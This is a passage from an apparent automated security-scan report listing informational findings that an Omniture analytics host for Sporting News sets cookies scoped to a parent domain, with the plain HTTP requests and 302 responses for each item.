Date: Thu, 05 May 2011 10:53:59 GMT
Server: scholar
Expires: Thu, 05 May 2011 10:53:59 GMT
Cache-Control: private
Connection: close

<html><head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><meta HTTP-EQUIV="imagetoolbar" content="no"><link rel="canonical" href="/"><title>Google Scholar</title><style>body,td,a,
...[SNIP]...

16.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s32555036570411

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s32555036570411 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www64
Content-Length: 0
Content-Type: text/plain
Connection: close


16.103. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s34991793073713

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s34991793073713 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www356
Content-Length: 0
Content-Type: text/plain
Connection: close


16.104. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s41508008833043

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s41508008833043 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www78
Content-Length: 0
Content-Type: text/plain
Connection: close


16.105. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s41670060879550

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s41670060879550 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820A[CE]; Expires=Tue, 3 May 2016 10:55:06 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:06 GMT
Last-Modified: Fri, 06 May 2011 10:55:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www262
Content-Length: 0
Content-Type: text/plain
Connection: close


16.106. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42057272375095

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42057272375095 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www339
Content-Length: 0
Content-Type: text/plain
Connection: close


16.107. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42119171968661

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42119171968661 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www72
Content-Length: 0
Content-Type: text/plain
Connection: close


16.108. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42397612622007

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42397612622007 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www394
Content-Length: 0
Content-Type: text/plain
Connection: close


16.109. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42653564326465

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42653564326465 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www47
Content-Length: 0
Content-Type: text/plain
Connection: close


16.110. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42715447763912

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42715447763912 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:07 GMT
Last-Modified: Fri, 06 May 2011 10:55:07 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www82
Content-Length: 0
Content-Type: text/plain
Connection: close


16.111. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42953626681119

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42953626681119 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820C[CE]; Expires=Tue, 3 May 2016 10:55:08 GMT; Domain=.2o7.net; Path=/
Location: http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.4.1
Expires: Wed, 04 May 2011 10:55:08 GMT
Last-Modified: Fri, 06 May 2011 10:55:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www83
Content-Length: 0
Content-Type: text/plain
Connection: close


16.112. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sportingnews.122.2o7.net
Path:   /b/ss/spnprod/1/H.15.1/s42998947284650

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/spnprod/1/H.15.1/s42998947284650 HTTP/1.1
Host: sportingnews.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi=[CS]v1|26E0FB02851D1EE9-40000107601F9114[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE];

Response

HTTP/1.1 302 Found
Date: Thu, 05 May 2011 10:55:07 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_twiwuhc=[CS]v4|0-0|4DC2820B[CE]; Expires=Tue, 3 May 2016 10:55:07 GMT; Domain=.2o7.net; Path=/
